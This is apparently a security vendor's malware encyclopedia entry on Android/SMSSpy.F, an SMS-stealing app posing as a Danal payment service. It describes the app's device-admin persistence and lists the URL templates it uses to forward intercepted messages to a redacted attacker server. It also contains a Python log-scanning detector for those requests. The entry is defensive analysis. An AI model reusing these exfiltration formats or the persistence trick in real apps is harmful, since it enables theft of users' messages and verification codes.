Android/SMSSpy.F!tr.spy

Analysis

Android/SMSSpy.F!tr.spy is a piece of malware targeting Android mobile phones.
The malicious package comes disguised as a mobile payment service application by Danal Corp. However, in the background, it spies on incoming SMS messages on the victim's phone and forwards them to the attacker's server.

Technical Details


The main application is called "Danal" (ref Fig1) and comes in the package "korean.alyac.view".

Fig1 : The application icon
When launched for the first time, the application asks the user for Device Administrator permissions (ref Fig2).

Fig2 : Device Administrator Rights request
If the user clicks on 'Activate', the application cannot be uninstalled until its Device Admin privileges are deactivated.
If the user clicks on 'Cancel', nothing visible happens.
In both cases, the application then returns to the main menu, which no longer contains the application icon.
However, in the background, the following malicious functions are performed:
  • When started, it registers the victim's phone with the attacker's server by sending a request to
    "http://XXX.XXX.XX.140/" + "?phone=" + [PHONE_NUMBER] + "&type=join"
  • Next, whenever an SMS message is received at the victim's phone, it is forwarded to
    "http://XXX.XXX.XX.140/" + "?phone=" + [PHONE_NUMBER] + "&send=" + [SMS_SENDER_NUMBER] + "&surak=" + [PHONE_NUMBER] + "&memo=" + [MESSAGE_BODY_ENCODED in UTF-8] + "&type=memo&xcode=1"
  • Right after, another request is sent to
    "http://XXX.XXX.XX.140/" + "check.php?phone=" + [PHONE_NUMBER]
  • If the response sent by the server to this request is "219083", the SMS is hidden from the victim
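The three request shapes above (registration, SMS forwarding, and the check.php query whose "219083" reply hides the message) are distinctive enough to match in outbound web proxy logs. The following is an added detection example written for this entry, not code from the original analysis or from the malware; the log format and the 203.0.113.140 host (a documentation-range placeholder for the redacted XXX.XXX.XX.140 server) are assumptions, and the matching keys on the query structure rather than the host so it still works when the server address changes.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample proxy log lines (timestamp, client IP, method, URL).
# 203.0.113.140 is a placeholder for the redacted server in the analysis.
SAMPLE_LOG = """\
2019-04-12T09:01:02Z 10.0.0.7 GET http://203.0.113.140/?phone=%2B821012345678&type=join
2019-04-12T09:05:40Z 10.0.0.7 GET http://203.0.113.140/?phone=%2B821012345678&send=%2B821098765432&surak=%2B821012345678&memo=Your+code+is+4321&type=memo&xcode=1
2019-04-12T09:05:41Z 10.0.0.7 GET http://203.0.113.140/check.php?phone=%2B821012345678
2019-04-12T09:07:00Z 10.0.0.9 GET http://example.org/index.html?phone=123
"""

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+\S+\s+(\S+)$")


def classify_url(url):
    """Return which SMSSpy.F request stage a URL matches, or None."""
    parts = urlsplit(url)
    q = parse_qs(parts.query)
    if "phone" not in q:
        return None
    # Stage 3: check.php?phone=... (server reply decides whether the SMS is hidden)
    if parts.path.endswith("/check.php"):
        return "hide-check"
    # Stage 1: ?phone=...&type=join registers the infected device
    if q.get("type") == ["join"]:
        return "register"
    # Stage 2: sender, recipient ("surak") and body ("memo") of a received SMS
    if q.get("type") == ["memo"] and all(k in q for k in ("send", "surak", "memo")):
        return "sms-exfil"
    return None


def scan_log(text):
    """Return (timestamp, client, stage) for every log line matching a stage."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, client, url = m.groups()
        stage = classify_url(url)
        if stage:
            hits.append((ts, client, stage))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

A client that produces all three stages in quick succession, as 10.0.0.7 does in the sample, is the pattern worth alerting on; the example.org line shares only the phone parameter and is ignored.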

Permissions required by the application:
  • RECEIVE_SMS
  • INTERNET
  • ACCESS_NETWORK_STATE
  • SEND_SMS
  • RECEIVE_BOOT_COMPLETED
  • READ_PHONE_STATE
  • INTERNET
  • SEND_SMS
  • ACCESS_FINE_LOCATION
  • ACCESS_COARSE_LOCATION
  • ACCESS_MOCK_LOCATION
  • WRITE_EXTERNAL_STORAGE
  • VIBRATE
  • FLASHLIGHT
  • READ_PHONE_STATE
  • ACCESS_NETWORK_STATE
  • MOUNT_UNMOUNT_FILESYSTEMS
  • CAMERA
  • WAKE_LOCK
  • RECORD_AUDIO

Recommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

Product                    Detection
FortiGate                  Extended
FortiClient                Extreme
FortiAPS
FortiAPU
FortiMail                  Extreme
FortiSandbox               Extreme
FortiWeb                   Extreme
Web Application Firewall   Extreme
FortiIsolator              Extreme
FortiDeceptor              Extreme
FortiEDR

Version Updates

Date         Version     Detail
2019-04-30   68.17900
2019-04-12   67.75300